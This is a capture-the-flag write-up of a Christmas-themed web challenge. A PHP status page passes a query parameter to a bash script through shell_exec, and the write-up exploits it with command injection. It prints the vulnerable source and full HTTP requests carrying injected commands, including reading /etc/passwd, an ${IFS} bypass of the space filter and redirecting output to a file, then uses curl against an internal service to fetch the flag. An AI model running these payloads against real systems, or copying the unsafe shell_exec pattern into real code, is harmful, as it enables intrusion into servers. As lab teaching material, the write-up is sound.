# Description
It seems that the evil elves have broken the controller gadget for the good old candy cane factory! Can you team up with the real red teamer Santa to hack back?

# Challenge
- There is downloadable part of the challenge.
- The site is basically used to check the status of the system. We can perform `UPS Status`,`Restart UPS`,`List Processes`,`List Ram`,`List Connections` and `List Storage`
- By the looks of it, it's probably performing bash commands in the back end.
`http://178.128.35.132:30271/?command=list_storage`
- If we try injecting some simple commands like `whoami`
```http
GET /?command=list_storage;whoami HTTP/1.1
Host: 178.128.35.132:30271
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
```html
         <div id='right_console'>
            <div class='consume_relative'>
              <pre>Filesystem      Size  Used Avail Use% Mounted on
overlay          50G   22G   26G  46% /
tmpfs            64M     0   64M   0% /dev
tmpfs           3.9G     0  3.9G   0% /sys/fs/cgroup
/dev/vda1        50G   22G   26G  46% /etc/hosts
shm              64M     0   64M   0% /dev/shm
tmpfs           3.9G     0  3.9G   0% /proc/acpi
tmpfs           3.9G     0  3.9G   0% /sys/firmware

www
</pre>
            </div>
          </div>
```
- We get `www`below it which means our injection worked. Let's try something else like `cat /etc/passwd`
```http
GET /?command=list_storage;cat+/etc/passwd HTTP/1.1
Host: 178.128.35.132:30271
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
- Unfortunately, it's not reflected in the response. Perhaps spaces are filtered, let's dive into the source code.

# Reviewing the source code.
- After looking around, these are the files I believe should be noted
- In models, `MonitorModel.php` is handling the input we're passing in
```php
<?php
class MonitorModel
{   
    public function __construct($command)
    {
        $this->command = $this->sanitize($command);
    }

    public function sanitize($command)
    {   
        $command = preg_replace('/\s+/', '', $command);
        return $command;
    }

    public function getOutput()
    {
        return shell_exec('/santa_mon.sh '.$this->command);
    }
}  
```
- Okay for the command we selected, it'll be sanitized by the function. Checking the regex on `regex101` it indeed is filtering newlines,tabs and space.
- Okay we now know that our command cannot contain spaces.
- That's all that was important in the `challenge` folder, moving on to `config`
- We have `nginx.conf` but checking it for common vulnerabilities reveals nothing.
- We also have `santa_mon.sh` which is the bash script being ran when executing commands
```sh
#!/bin/bash 

ups_status() {
    curl localhost:3000;
}

restart_ups() {
    curl localhost:3000/restart;
}

list_processes() {
    ps -ef
}

list_ram() {
    free -h
}

list_connections() {
    netstat -plnt
}

list_storage() {
    df -h
}

welcome() {
    echo "[+] Welcome to Santa's Monitor Gadget!"
}

if [ "$#" -gt 0 ]; then
    $1
fi
```
- Also in `ups_manager.py` that flag is revealed, the python script is hosting a http server locally on port 3000
```py
                        elif self.path == '/get_flag':
                                resp_ok()
                                self.wfile.write(get_json({'status': 'HTB{f4k3_fl4g_f0r_t3st1ng}'}))
                                return
                        self.send_error(404, '404 not found')
```
The path to the flag is `/get_flag` on port 3000
- `supervisord.conf` also reveals the location of `ups_manager.py` on the remote which is at `/root/ups_manager.py`

# Exploit
- With all that knowledge, we can start hacking.
- First of all, I decided to search for [Command Injection without spaces](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Command%20Injection/README.md#bypass-without-space)
- This payload worked the best for me
```txt
swissky@crashlab:~$ echo${IFS}"RCE"
```
- Let' also try to redirect the output of our commands
```http
GET /?command=;ls${IFS}>lol.txt HTTP/1.1
Host: 178.128.35.132:30271
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
- And if we try to search for `lol.txt`, we get the output of our command! So now we know redirection works.
```txt
index.php
models
controllers
static
views
lol.txt
```
- Let's try to `cat` out `/root/ups_manager.py` for the flag since it's there
```http
GET /?command=;cat${IFS}/root/ups_manager.py>lol.txt HTTP/1.1
Host: 178.128.35.132:30271
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
- And we get an empty response,I'm assuming since we're user `www` we don't have permission to `/root`
- But we do know that it is hosting a http server locally on port 3000, what if we try to curl the flag?
```http
GET /?command=;curl${IFS}localhost:3000/get_flag>lol.txt HTTP/1.1
Host: 178.128.35.132:30271
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
**Fingers Crossed**
```txt
{"status": "HTB{54nt4_i5_th3_r34l_r3d_t34m3r}"}
```
- And we get the flag!
- Note that I also tried to get a reverse shell, but it took way too long to achieve and it didn't even work.


